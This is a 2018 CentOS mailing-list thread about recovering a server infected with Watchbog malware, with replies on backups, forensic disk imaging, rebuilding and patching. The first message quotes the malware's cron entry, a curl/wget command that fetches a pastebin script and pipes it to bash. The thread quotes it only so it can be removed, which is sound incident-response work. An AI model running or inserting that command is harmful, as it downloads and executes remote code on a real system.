On 12/18/18 8:31 AM, mark wrote: > Valeri Galtsev wrote: >> On 12/17/18 2:57 PM, Mauricio Tavares wrote: >>> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan >>> <kaushalshriyan at gmail.com> wrote: >>>> >>>> >>>> Is there a way to find out how the CentOS 7.5 Linux box got infected >>>> with malware? Currently i am referring to >>>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw >>>> areransomware.html to carry out the below steps and is done manually. >>>> >>>> 1)rm -fr /tmp/*timesyncc.service* >>>> 2)crontab -e -u apigee >>>> delete the cron entry */1 * * * * (curl -fsSL >>>> https://pastebin.com/raw/aGTSGJJp||wget -q -O- >>>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 >>>> 3)ps aux | grep watchbog >>>> kill -9 pidof watchbog >>>> >>>> Any suggestions or recommendations to find out how CentOS 7.5 Linux >>>> box got infected with Watchbog Malware. Is there any open source >>>> software which can >>> >>> do you have untampered log files? >>> >>>> be installed on CentOS 7.5 Linux box to detect and prevent Malware? >> >> Standard compromise recovery procedure since forever is (your local >> policy my have slightly different order about notifications and similar): >> >> 1. back up all user data > > You should have been doing that all along. Do not exclude this from the [more or less] full list of standard compromise recovery routine I tried to outline. Even though you had to do backups all the time, backup at this point may have latest changes not present in latest routine backup. And you last had o restore something from your backup how many years ago? So your knowledge that that backup indeed works was tested years ago... > > First step, before you do anything else, is pull the hard drive, put it > into a hot-swap or external bay, and dd the entire drive to an identical > one. THAT goes to forensics. Indeed. Or adjust this part to "everything is hosted on hardware RAID device", for which you will have to boot off DVD, mount and dump all elsewhere for forensics. But! Forensics is different and sophisticated story, and when you learn in depth that the first thing you will learn is: Powering off the system, or even just disconnecting from the network may prevent you totally from learning several things about compromise. But this is really huge subject... > > Alternatively, pull the h/d, put in a new one, reset the BIOS to factory > settings - that includes pulling the battery... *then* set what you need, > and then build it new, and restore from backups. > <snip> > Why, yes, we did just do this, um, last year, after a compromise via a > WordPress security hole. It did not manage to get to any other systems (we > checked, and only a few run WordPress). And yes, preventing, no matter how tedious it may seem is orders of magnitude easier than recovering from compromise. So: secure the box. And update, update, update.... Valeri > > mark > > > > > _______________________________________________ > CentOS mailing list > CentOS at centos.org > https://lists.centos.org/mailman/listinfo/centos > -- ++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++